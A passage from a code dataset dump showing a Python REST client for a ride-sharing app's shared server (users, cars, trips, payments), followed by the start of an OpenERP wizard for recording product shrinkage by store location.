(r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()[\"user\"])\n\n\n\"\"\"Attempts to perform a request. If the request is rejected because of a reference missmatch, the\noperation will be repeated until successfully completed or until a maximum number of attempts is\nreached or until another error arises.\"\"\"\ndef _permformUpdate(f, endpoint, updatedEntityName, updatedEntity):\n\tr = f(endpoint, updatedEntity)\n\tattempts = 0\n\twhile (r.status_code == constants.UPDATE_CONFLICT) and (attempts < MAX_ATTEMPTS):\n\t\tprint (\"UPDATE FAILED, RETRYING...\")\n\t\tnewData = json.loads(requests.get(endpoint, headers=headers).text)\n\t\tupdatedEntity[\"_ref\"] = newData[updatedEntityName][\"_ref\"]\n\t\tr = f(endpoint, updatedEntity)\n\t\tattempts += 1\n\tif (r.status_code == constants.UPDATE_CONFLICT):\n\t\tlogger.getLogger().error(\"Attempted to update user. Request failed with reference error.\")\n\t\traise ValueError(\"Error attempting to update entity. Try again later.\")\n\treturn r\n\n\"\"\"Receives a user represented by a json structure and attempts to update its data.\nReturns False if the user id does not match any user id or _ref value is invalid.\nReturns True if the user info was successfully updated.\"\"\"\ndef updateUser(user_js):\n\tendpoint = USER_END + \"/\" + str(user_js[\"_id\"]) + QUERY_TOKEN + os.environ[\"APP_TOKEN\"]\n\tr = _permformUpdate(lambda ep, u: requests.put(ep, json.dumps(u), headers=headers), endpoint, \"user\", user_js)\n\tif (r.status_code == constants.NOT_FOUND):\n\t\treturn (False, r.json()['message'])\n\tif (r.status_code != constants.SUCCESS):\n\t\traise Exception(\"Shared Server returned error: %d\"%(r.status_code))\n\treturn (True, r.json()['user'])\n\n\"\"\" Asks shared server to create a new user\"\"\"\n@ServerTokenUpdater()\ndef createUser(user_js):\n\tr = requests.post(USER_END + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], data = json.dumps(user_js), headers=headers)\n\tif (r.status_code != constants.CREATE_SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()[\"user\"])\n\n\"\"\"Receives a user represented by a json structure and validates its credentials.\nReturns True if the credentials were invalid, returns False otherwise.\n\"\"\"\ndef validateUser(user_js):\n\tr = requests.post(USER_END + \"/validate\" + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], data = json.dumps(user_js), headers=headers)\n\tif (r.status_code == constants.UNAUTHORIZED):\n\t\tServerTokenUpdater().updateToken()\n\t\tr = requests.post(USER_END + \"/validate\" + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], data = json.dumps(user_js), headers=headers)\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (False, r)\n\treturn (True, r.json()['user'])\n\n\"\"\"Receives a user id and attempts to delete it. Returns True if the user exists and is correctly deleted.\nReturns False if the user id does not match any user id.\n\"\"\"\ndef deleteUser(userId):\n\tr = requests.delete(USER_END + \"/\" + str(userId) + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], headers=headers)\n\tif (r.status_code == constants.UNAUTHORIZED):\n\t\tServerTokenUpdater().updateToken()\n\t\tr = requests.delete(USER_END + \"/\" + str(userId) + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], headers=headers)\n\tif (r.status_code != constants.DELETE_SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (False, r.status_code)\n\treturn (True, r.status_code)\n\n\"\"\"Receives a user id and returns a list of all the cars owned by that user.\n\"\"\"\n@ServerTokenUpdater()\ndef getUserCars(userId):\n\tr = requests.get(USER_END + \"/\" + str(userId) + CARS_END)\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\traise Exception(\"Shared Server returned error: %d\"%(r.status_code))\n\treturn (r.status_code, r.json()[\"cars\"])\n\n\"\"\"Receives a user id and a car id. Returns the information of the car with\nmatching id that belongs to the identified user.\n\"\"\"\n@ServerTokenUpdater()\ndef getUserCar(userId, carId):\n\tr = requests.get(USER_END + \"/\" + str(userId) + CARS_END + \"/\" + str(carId) + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], headers=headers)\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()[\"car\"])\n\n\"\"\" Receives a user id, a car owner and a dictionary containing the properties of the car\nwith the following layout:\n{\n 'name': 'brandName',\n 'value': 'plateNumber'\n}\nAttempts to create a new car with the information given.\nReturns a car object on successful creation.\n\"\"\"\n@ServerTokenUpdater()\ndef createUserCar(userId, carProperties):\n\tcarInfo = { \"id\" : \"1\" }\n\tcarInfo[\"_ref\"] = \"1\"\n\tcarInfo[\"owner\"] = \"FIUBER\"\n\tcarInfo[\"properties\"] = [carProperties]\n\tr = requests.post(USER_END + \"/\" + str(userId) + CARS_END + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], data = json.dumps(carInfo), headers=headers)\n\tif (r.status_code != constants.CREATE_SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()[\"car\"])\n\n\"\"\"Receives a user id and attempts to delete it. Returns True if the user exists and is correctly deleted.\nReturns False if the user id does not match any user id.\n\"\"\"\n@ServerTokenUpdater()\ndef deleteUserCar(userId, carId):\n\tr = requests.delete(USER_END + \"/\" + str(userId) + CARS_END + \"/\" + str(carId) + QUERY_TOKEN + os.environ[\"APP_TOKEN\"])\n\tif (r.status_code == constants.NOT_FOUND):\n\t\treturn (False, r.status_code)\n\tif (r.status_code != constants.DELETE_SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\traise Exception(\"Shared Server returned error: %d\"%(r.status_code))\n\treturn (True, r.status_code)\n\n\n\"\"\"Receives a user id number, a car id number and a car represented by a json structure with the following layout:\n\t{\n\t \"id\": \"string\",\n\t \"_ref\": \"string\",\n\t \"owner\": \"string\",\n\t \"properties\": [\n\t {\n\t \"name\": \"string\",\n\t \"value\": \"string\"\n\t }\n\t ]\n\t}\nReturns False if the user and car ids do not match any existing vehicles.\nReturns True if the car info was successfully updated.\"\"\"\ndef updateUserCar(userId, carId, car):\n\tendpoint = USER_END + \"/\" + str(userId) + CARS_END + \"/\" + str(carId) + QUERY_TOKEN + os.environ[\"APP_TOKEN\"]\n\tr = _permformUpdate(lambda ep, u: requests.put(ep, json.dumps(u), headers=headers), endpoint, \"car\", car)\n\tif (r.status_code == constants.NOT_FOUND):\n\t\treturn (False, r.json()['message'])\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (True, r.json()['car'])\n\n\n\"\"\"Receives a user id and returns a list with all the transactions made by that user.\n\"\"\"\n@ServerTokenUpdater()\ndef getUserTransactions(id):\n\tendpoint = USER_END + \"/\" + str(id) + TRANSACT_END + QUERY_TOKEN + os.environ[\"APP_TOKEN\"]\n\tr = requests.get(endpoint, headers=headers)\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()['transactions'])\n\n\n\"\"\"Receives a user id and a json representing a transaction with the following layout:\n\t {\n\t \"trip\": \"string\",\n\t \"timestamp\": 0,\n\t \"cost\": {\n\t \"currency\": \"string\",\n\t \"value\": 0\n\t },\n\t \"description\": \"string\",\n\t \"data\": {}\n\t }\nReturns a tuple (True, transaction) if the transaction was successfully created.\n\"\"\"\n@ServerTokenUpdater()\ndef makePayment(id, transaction):\n\tendpoint = USER_END + \"/\" + str(id) + TRANSACT_END + QUERY_TOKEN + os.environ[\"APP_TOKEN\"]\n\ttransaction[\"id\"] = \"1\"\n\tr = requests.put(endpoint, data = json.dumps(transaction), headers=headers)\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()[\"transaction\"])\n\n\"\"\"Receives a user id. Returns a json structures with the following layout:\n \"trips\": [\n {\n \"id\": \"string\",\n \"applicationOwner\": \"owner name\",\n \"driver\": \"driver id\",\n \"passenger\": \"passanger id\",\n \"start\": {\n \"address\": {\n \"street\": \"street name\",\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n }\n },\n \"timestamp\": 0\n },\n \"end\": {\n \"address\": {\n \"street\": \"street name\",\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n }\n },\n \"timestamp\": 0\n },\n \"totalTime\": 0,\n \"waitTime\": 0,\n \"travelTime\": 0,\n \"distance\": 0,\n \"route\": [\n {\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n },\n \"timestamp\": 0\n }\n ],\n \"cost\": {\n \"currency\": \"coin\",\n \"value\": 0\n }\n }\n ]\n\"\"\"\n@ServerTokenUpdater()\ndef getUserTrips(id):\n\tendpoint = USER_END + \"/\" + str(id) + TRIPS_END + QUERY_TOKEN + os.environ[\"APP_TOKEN\"]\n\tr = requests.get(endpoint, headers=headers)\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()['trips'])\n\n\"\"\"Receives a trip id. Returns a json structure with the following layout:\n{\n \"id\": \"string\",\n \"applicationOwner\": \"string\",\n \"driver\": \"string\",\n \"passenger\": \"string\",\n \"start\": {\n \"address\": {\n \"street\": \"string\",\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n }\n },\n \"timestamp\": 0\n },\n \"end\": {\n \"address\": {\n \"street\": \"string\",\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n }\n },\n \"timestamp\": 0\n },\n \"totalTime\": 0,\n \"waitTime\": 0,\n \"travelTime\": 0,\n \"distance\": 0,\n \"route\": [\n {\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n },\n \"timestamp\": 0\n }\n ],\n \"cost\": {\n \"currency\": \"string\",\n \"value\": 0\n }\n}\n\"\"\"\n@ServerTokenUpdater()\ndef getTrip(id):\n\tendpoint = os.environ[\"SS_URL\"] + TRIPS_END + \"/\" + str(id) + QUERY_TOKEN + os.environ[\"APP_TOKEN\"]\n\tr = requests.get(endpoint, headers=headers)\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()['trip'])\n\n\n\"\"\"Receives a json structure representing a trip, with the following layout:\n \"trip\": {\n \"id\": \"string\",\n \"applicationOwner\": \"string\",\n \"driver\": \"string\",\n \"passenger\": \"string\",\n \"start\": {\n \"address\": {\n \"street\": \"string\",\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n }\n },\n \"timestamp\": 0\n },\n \"end\": {\n \"address\": {\n \"street\": \"string\",\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n }\n },\n \"timestamp\": 0\n },\n \"totalTime\": 0,\n \"waitTime\": 0,\n \"travelTime\": 0,\n \"distance\": 0,\n \"route\": [\n {\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n },\n \"timestamp\": 0\n }\n ],\n \"cost\": {\n \"currency\": \"string\",\n \"value\": 0\n }\n },\n \"paymethod\": {\n \"paymethod\": \"string\",\n \"parameters\": {}\n }\n\nReturns a tuple (201, trip) if the trip was successfully created.\n\"\"\"\n@ServerTokenUpdater()\ndef createTrip(trip):\n\tr = requests.post(os.environ[\"SS_URL\"] + TRIPS_END + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], data = json.dumps(trip), headers=headers)\n\tif (r.status_code != constants.CREATE_SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\treturn (r.status_code, r.json())\n\n\"\"\"Receives a json structure containing all the trip data, with the following layout:\n{\n \"id\": \"string\",\n \"applicationOwner\": \"string\",\n \"driver\": \"string\",\n \"passenger\": \"string\",\n \"start\": {\n \"address\": {\n \"street\": \"string\",\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n }\n },\n \"timestamp\": 0\n },\n \"end\": {\n \"address\": {\n \"street\": \"string\",\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n }\n },\n \"timestamp\": 0\n },\n \"totalTime\": 0,\n \"waitTime\": 0,\n \"travelTime\": 0,\n \"distance\": 0,\n \"route\": [\n {\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n },\n \"timestamp\": 0\n }\n ],\n \"cost\": {\n \"currency\": \"string\",\n \"value\": 0\n }\n}\nReturns trip cost estimation:\n {\n \"currency\": \"string\",\n \"value\": 0\n }\n\"\"\"\n@ServerTokenUpdater()\ndef estimateTrip(tripData):\n\tr = requests.post(os.environ[\"SS_URL\"] + TRIPS_END + \"/estimate\" + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], data = json.dumps(tripData), headers=headers)\n\tif (r.status_code != constants.CREATE_SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\treturn (r.status_code, r.json())\n\n\n\"\"\"Returns a list containing all paymethods, such as the following:\n [\n {\n \"name\": \"paymethodName\",\n \"parameters\": {\"number\": \"112233\", \"type\": \"credit\", \"expirationMonth\": \"01\", \"expirationYear\": \"19\", \"ccvv\": \"225\"}\n }\n ]\n\"\"\"\n@ServerTokenUpdater()\ndef getPaymethods():\n\tr = requests.get(os.environ[\"SS_URL\"] + PAYMETHODS_END + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], headers=headers)\n\tprint(r)\n\tif (r.status_code != constants.CREATE_SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()[\"paymethods\"])\n\n\n\n\n","sub_path":"src/main/com/ServerRequest.py","file_name":"ServerRequest.py","file_ext":"py","file_size_in_byte":15277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"286167672","text":"# coding: utf-8\n\n#########################################################################################################################\n# @version : 1.0 #\n# @autor : Alicia Romero #\n# @creacion : 2015-11-04 (aaaa/mm/dd) #\n# @linea : Máximo, 121 caracteres #\n# @descripcion: Wizard para captura de producto por tienda #\n#########################################################################################################################\n\n#Importando las clases necesarias\nfrom osv import fields, osv\nimport time\nimport datetime\nimport pooler\nfrom openerp.tools.translate import _\n\n#Modelo : Registro de Producto\nclass merma_wizard_productos(osv.TransientModel):\n \n _description = 'Wizard Productos'\n \n ### //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ###\n ### ###\n ### METODOS ###\n ### ###\n ### //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ###\n def guardarProducto(self, cr, uid, ids, cantidad_mover=0.0, context = { }):\n \"\"\"\n Función del Botón objeto \"guardarProducto\" con etiqueta \"Guardar\" \n para almacenar los datos en la tabla 'merma_seleccion' modelo 'Lista de Merma'\n * Para OpenERP [button]\n * Argumentos OpenERP: [cr, uid, ids, context]\t\t\t\n @return dict\n \"\"\"\n #objeto\n datos=self.pool.get( self._name ).browse( cr, uid, ids[0] )\n cantidad_mover=datos.cantidad_mover\n valida=cantidad_mover\n if valida > 0 :\n producto=datos.producto\n clave=datos.clave_ide\n cod_ean13=datos.cod_ean13\n id_producto=datos.producto_m2o_id.id\n tienda=datos.almacen_m2o_id.id\n destino_id=datos.destino_mov_m2o_id.id\n localizacion_id=datos.localizacion_m2o_id.id\n cantidad_mover=datos.cantidad_mover\n cantidad_prod=datos.cantidad_prod\n unidad_med=datos.unidad_med\n unidad_med_id=datos.medida_m2o_id.id\n precio=datos.precio\n empleado_autor=datos.empleado_autor\n autor_uid=uid\n nombre_destino=datos.destino_mov_m2o_id.name\n name_move=producto+\" \"+ nombre_destino\n clave_sep = nombre_destino.split()\n nombre_destino = clave_sep[1].lower()\n estado=\"espera\"\n #se guarda id de wizard\n ide_wizard = ids[0]\n #creo fechas\n fecha_x = datetime.datetime.now()\n fecha_mov_stock = time.strftime(\"%y%m%d\")\n resul=cantidad_prod - cantidad_mover\n\n if resul >= 0:\n #Valores a insertar\n valores = (\n autor_uid, fecha_x, ide_wizard, clave, fecha_mov_stock, empleado_autor, name_move, cod_ean13, producto, cantidad_mover, \n unidad_med, unidad_med_id, precio, autor_uid, localizacion_id, destino_id, id_producto, tienda, nombre_destino, estado,\n cantidad_prod,\n )\n # print valores\n this = self.browse(cr, uid, ids)[0]\n self.write(cr, uid, ids, {\n 'cod_ean13':'',\n 'cod_ubicacion':'',\n 'state': 'producto',\n \n }, context=context)\n #se insertan los nuevos datos a la tabla listado_codigo\n cr.execute(\n \"\"\"\n INSERT INTO merma_seleccion\n (create_uid, create_date, ide_wizard, clave_ide, fecha_creacion, name_login, name_move, ean13, producto, cantidad, unidad_med, \n product_m2o_med_id, precio_prod, usuario_m2o_id, location_id, destino_id, producto_s_m2o_id, almacen_m2o_id, nombre_destino,\n estado, cantidad_ubica )\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n \"\"\", valores )\n \n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'res_model': 'merma_wizard_productos',\n 'target': 'new',\n }\n else:\n this = self.browse(cr, uid, ids)[0]\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'res_model': 'merma_wizard_productos',\n 'target': 'new',\n } \n else :\n this = self.browse(cr, uid, ids)[0]\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'res_model': 'merma_wizard_productos',\n 'target': 'new',\n }\n\n #---------------------------------------------------------------------------------------------------------------------------------------------------\n def obtenerProducto(self, cr, uid, ids, cod_ean13, cod_ubicacion='0' ):\n \"\"\"\n Función del Botón objeto objeto \"obtenerProducto\" con etiqueta \"Buscar\" y y Evento onchange de los campos \"cod_ean13\" y \"cod_ubicacion\"\n para obtener y actualizar los datos del producto\n * Para OpenERP [button]\n * Para OpenERP [onchange]\n * Argumentos OpenERP: [cr, uid, ids, cod_ean13, cod_ubicacion]\t\t\t\n @param cod_ean13: (char) Codigo del producto\n @param cod_ubicacion: (char) Codigo de la ubicacion de la tienda\n @return dict\n \"\"\"\n context =''\n\n datos=self.pool.get( self._name ).browse( cr, uid, ids[0] )\n if cod_ean13 != False and cod_ubicacion != False:\n #declaro id de localizacion\n id_locali=0\n #valida codigos no sean False\n if cod_ean13 :\n cod_ean13 = cod_ean13\n else:\n cod_ean13 = datos.cod_ean13\n if cod_ubicacion:\n cod_ubicacion = cod_ubicacion\n else:\n cod_ubicacion = datos.cod_ubicacion\n #obtener valores \n tienda=datos.almacen_m2o_id.id\n destino=datos.destino_mov_m2o_id.id\n muestra_dest=datos.destino_mov_m2o_id.complete_name\n ide_wizard = ids[0]\n existe = False\n #valida codigo no sea vacio\n if len(cod_ean13) >= 10:\n #valida que el codigo sea digitos y sean 13\n if len(cod_ean13) == 13 and cod_ean13.isdigit() == True:\n fecha = time.strftime(\"%y%m%d\")\n cr.execute(\n \"\"\"\n SELECT\n ean13\n FROM merma_seleccion\n WHERE fecha_creacion = %s\n AND ean13 =%s\n AND create_uid =%s\n \"\"\",(fecha, cod_ean13, uid ))\n registro_consultado = cr.fetchall()\n # print registro_consultado\n existe = (False) if (registro_consultado == [] or registro_consultado == None ) else ( ( True ) )\n # print existe\n if existe == False:\n #consulta obtener datos del producto apartir del codigo\n cr.execute(\n \"\"\"\n SELECT p.name_template,\n p.image_small,\n p.id,\n pt.list_price AS precio,\n pu.name AS medida,\n pt.uom_id\n FROM product_product p\n INNER JOIN product_template pt\n ON p.product_tmpl_id=pt.id\n INNER JOIN product_uom pu\n ON pt.uom_id=pu.id\n WHERE p.active=True\n AND\n ean13 =%s\n order by p.id desc\n limit 1\n \"\"\",(cod_ean13,))\n producto = cr.fetchall()\n # valida producto exista\n if producto != None and type( producto ) in ( list, tuple, dict ) and producto != [] :\n producto = producto[0]\n id_producto=producto[2]\n #valida que el codigo sea digitos y sean 13\n if len(cod_ubicacion) == 13 and cod_ubicacion.isdigit() == True:\n #consulta para obtener id de la ubicacion apartir del codigo\n cr.execute(\n \"\"\"\n SELECT id\n FROM stock_location\n WHERE active=True and\n x_ean13_location_correct = %s\n \"\"\",(cod_ubicacion,))\n ubica = cr.fetchall()\n \n if ubica != None and type( ubica ) in ( list, tuple, dict ) and ubica != [] :\n ubica = ubica[0]\n #Variable con el id de la ubicacion\n id_locali= ubica[0]\n #objeto de stock_location \"Ubicaciones\"\n location_pool = self.pool.get('stock.location')\n #nombre completo de la ubicacion para mostrar\n muestra_local = location_pool.browse(cr, uid, id_locali, context=context).complete_name\n #consulta para obtener el id de la \"ubicacion de exitencias\" de la tienda y obtener los hijos de esta para\n #comparar y validar que el \"codigo de ubicacion\" del producto pertenesca a la tienda seleccionada.\n cr.execute(\n \"\"\"\n SELECT\n s.lot_stock_id\n from stock_warehouse s \n INNER JOIN stock_location se\n ON s.lot_stock_id = se.id\n WHERE s.id= %s\n \"\"\",(tienda,))\n id_ubic_exist_tienda=cr.fetchone()\n #toma el valor del id de la ubicacion\n id_ubic_exist_tienda=id_ubic_exist_tienda[0]\n #Se obtienen los hijos apartir de la ubicacion padre\n local_hijos_tienda = location_pool.search(cr, uid, [('location_id', 'child_of', [id_ubic_exist_tienda])], context=context)\n #Se declara variable\n pertenece_ubicacion=False\n #recorre lista de ubicaciones de la tienda \"local_hijos_tienda\" y si encuentra que uno de los id coincide con el id de la\n # ubicacion cambia la variable de pertenece_ubicacion a true.\n for id_ubica in local_hijos_tienda:\n if id_ubica == id_locali:\n pertenece_ubicacion=True\n #Valida que la ubicacion pertenesca a la tienda\n if pertenece_ubicacion == True:\n #Consulta para validar que exista el producto en la ubicacion\n cr.execute(\n \"\"\"\n SELECT location_id, product_id, trunc(qty, 3) \n FROM stock_report_prodlots \n WHERE location_id = %s and qty >0\n AND product_id = %s\n \"\"\",(id_locali, id_producto))\n existe_producto = cr.fetchall()\n if existe_producto != None and type(existe_producto) in ( list, tuple, dict ) and existe_producto != [] :\n existe_producto = existe_producto[0]\n cantidad_en_ubicacion= existe_producto[2]\n #se crea clave\n ide_wizard = ids[0]\n datos=self.pool.get( self._name ).browse( cr, uid, ids[0] )\n clave_destino=str(datos.destino_mov_m2o_id.name)\n clave_sep = clave_destino.split()\n clave_sepa = clave_sep[1]\n clave = clave_sep[0].upper()+clave_sepa[:3].upper() + str(ide_wizard)\n \n self.write(cr, uid, ids, {\n 'producto': producto[0],\n 'imagen': producto[1],\n 'producto_m2o_id': id_producto,\n 'precio' : producto[3],\n 'unidad_med' : producto[4],\n 'medida_m2o_id' :producto[5],\n 'cantidad_prod' : cantidad_en_ubicacion,\n 'cantidad_mover' : '',\n 'cod_ean13': cod_ean13,\n 'cod_ubicacion': cod_ubicacion,\n 'localizacion_m2o_id': id_locali,\n 'almacen_m2o_id': tienda,\n 'destino_mov_m2o_id': destino,\n 'muestra_destino': muestra_dest,\n 'muestra_localizacion': muestra_local,\n 'clave_ide': clave,\n 'state': 'guardar',\n }, context=context)\n \n this = self.browse(cr, uid, ids)[0]\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'res_model': 'merma_wizard_productos',\n 'target': 'new',\n }\n else:\n return {\n 'warning' : {\n 'title' : '¡No hay producto!',\n 'message' : 'En la ubicación seleccionada no hay existencia '+\n 'del producto',\n } \n }\n \n else:\n return {\n 'warning' : {\n 'title' : '¡Error! Código de Ubicación',\n 'message' : 'La ubicación NO pertenece a la tienda ' +\n 'seleccionada',\n } \n }\n \n else:\n return {\n 'warning' : {\n 'title' : '¡La Ubicación No Existe!',\n 'message' : 'El codigo de la ubicación no pertenece a ninguna '+\n 'Ubicacion',\n } \n } \n else:\n return {\n 'warning' : {\n 'title' : '¡Corriga Codigo Ubicación!',\n 'message' : 'El código debe contener 13 digitos, sin espacios ni letras' ,\n } \n } \n \n else:\n return {\n 'warning' : {\n 'title' : '¡El Producto No Existe!',\n 'message' : 'El codigo ean13 no pertenece a ningun '+\n 'producto ¡Intente con otro codigo!',\n } \n }\n \n else:\n return {\n 'warning' : {\n 'title' : '¡El Producto ya se Registro!',\n 'message' : 'Ingrese el siguiente codigo de '+\n 'producto, este ya fue registrado',\n } \n }\n \n \n else:\n return {\n 'warning' : {\n 'title' : '¡Corriga Codigo Producto!',\n 'message' : 'El codigo debe contener 13 digitos, sin espacios ni letras' ,\n } \n } \n else:\n this = self.browse(cr, uid, ids)[0]\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'res_model': 'merma_wizard_productos',\n 'target': 'new',\n }\n \n else :\n this = self.browse(cr, uid, ids)[0]\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'res_model': 'merma_wizard_productos',\n 'target': 'new',\n } \n #--------------------------------------------------------------------------------------------------------------------------------------------------- \n def botonRegresar(self, cr, uid, ids, context = { }):\n \"\"\"\n Función del Botón objeto objeto \"botonRegresar\" con etiqueta \"Regresar\"\n para regresar al estado 'producto' y poder a modificar el producto.\n * Para OpenERP [button]\n * Argumentos OpenERP: [cr, uid, ids, context]\n \"\"\"\n #creacion del objeto\n datos=self.pool.get( self._name ).browse( cr, uid, ids[0] )\n tienda=datos.almacen_m2o_id.id\n destino=datos.destino_mov_m2o_id.id\n codigo=datos.cod_ean13\n muestra=datos.destino_mov_m2o_id.complete_name\n #se rescriben los datos\n self.write(cr, uid, ids, {\n 'almacen_m2o_id': tienda,\n 'destino_mov_m2o_id': destino,\n 'cod_ean13': '',\n 'muestra_destino': muestra,\n 'state': 'producto',\n }, context=context)\n this = self.browse(cr, uid, ids)[0]\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'res_model': 'merma_wizard_productos',\n 'target': 'new',\n } \n #---------------------------------------------------------------------------------------------------------------------------------------------------\n def onchange_filtro_almacen( self, cr, uid, ids, almacen_m2o_id) :\n \"\"\"\n Evento OnChange del campo \"almacen_m2o_id\" con etiqueta \"Tienda\" para obtener el filtro de ubicaciones de esa tienda en el campo\n destino_mov_m2o_id con etiqueta \"Ubicacion Destino\".\n * Para OpenERP [onchange]\n * Argumentos OpenERP: [cr, uid, ids]\t\t\t\n @param almacen_m2o_id: (int) Manda el valor de la tienda o almacen seleccionado\n @return dict\n \"\"\"\n context =''\n #toma el datos seleccionado\n try:\n id_almacen =str(almacen_m2o_id)\n except :\n return {\n 'value' : {\n 'localizacion_m2o_id' : False,\n 'destino_mov_m2o_id' : False,\n },\n 'domain' : {\n 'localizacion_m2o_id' : [( 'id', '=', '0' )],\n 'destino_mov_m2o_id' : [( 'id', '=', '0' )], \n },\t\t\t\t\n }\n #consulta para obtener el id de la localidad en almacen y el nomnre de la tienda seleccionada\n cr.execute(\n \"\"\"\n SELECT\n s.name\n from stock_warehouse s \n INNER JOIN stock_location se\n ON s.lot_stock_id = se.id\n WHERE s.id= %s\n \"\"\",(id_almacen,))\n almacenes=cr.fetchall()\n \n if almacenes != None and type( almacenes ) in ( list, tuple, dict ):\n d_almacen=almacenes[0]\n ubicacion_seleccionada=d_almacen[0]\n #obtiene el nombre de las tiendas o de almacenes para hacer una comparaciones y obtener la variable con el numero de sucursales\n cr.execute(\n \"\"\"\n SELECT\n s.name\n from stock_warehouse s \n INNER JOIN stock_location se\n ON s.lot_stock_id = se.id\n order by s.id\n \"\"\",)\n lista_tienda=cr.fetchall()\n\n #Se obtiene el numero de tiendas\n rango=len(lista_tienda)\n suma=0\n sucursal=0\n\n for i in range(rango):\n suma=suma + 1\n if ubicacion_seleccionada.find(str(suma)) >= 0:\n sucursal=suma \n\n list_loc_tienda = []\n cr.execute(\n \"\"\"\n SELECT id\n FROM stock_location ls\n WHERE scrap_location = true and\n ls.name like 'Scrapped'\n \"\"\"\n )\n scrapped = cr.fetchone()\n id_scrapped = scrapped[0]\n #Se obtiene el id de las localizaciones virtuales de cada tienda\n cr.execute(\n \"\"\"\n SELECT\n id\n from stock_location ls\n WHERE \n location_id=%s\n and\n scrap_location = true\n order by id\n \"\"\",(id_scrapped,))\n #recorre las lista de localidades\n for id_tienda in cr.fetchall():\n lista=id_tienda[0]\n list_loc_tienda.append(lista) \n\n location_ids = []\n i=5\n #objeto de ubicaciones de almacen\n location_pool = self.pool.get('stock.location')\n for id_tienda in list_loc_tienda:\n id_tienda=int(id_tienda)\n ubicacion_t = location_pool.browse(cr, uid, id_tienda)\n nombre = ubicacion_t.name\n if sucursal>0:\n if nombre.find(\"SM1 Scrap Parent\") >= 0 and sucursal==1 :\n location_ids = location_pool.search(cr, uid, [('location_id', 'child_of', [id_tienda])], context=context)\n # print location_ids\n if nombre.find(\"SM2 Scrap 